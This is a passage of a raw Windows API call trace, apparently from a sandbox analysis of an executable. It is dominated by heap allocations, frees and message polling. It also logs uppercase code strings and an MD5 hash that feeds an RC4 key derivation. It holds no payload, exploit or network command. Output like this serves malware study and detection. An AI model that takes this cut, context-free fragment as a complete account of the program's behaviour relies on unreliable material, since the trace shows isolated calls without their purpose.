lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0266.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.451] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.451] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.451] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.451] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.451] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0266.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.452] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.452] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.452] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.453] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.453] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.453] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.453] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.454] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.454] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.454] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.454] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.454] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.454] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.455] CryptHashData (hHash=0xaa59a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.455] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.455] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.455] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.455] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.456] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.456] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0266.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 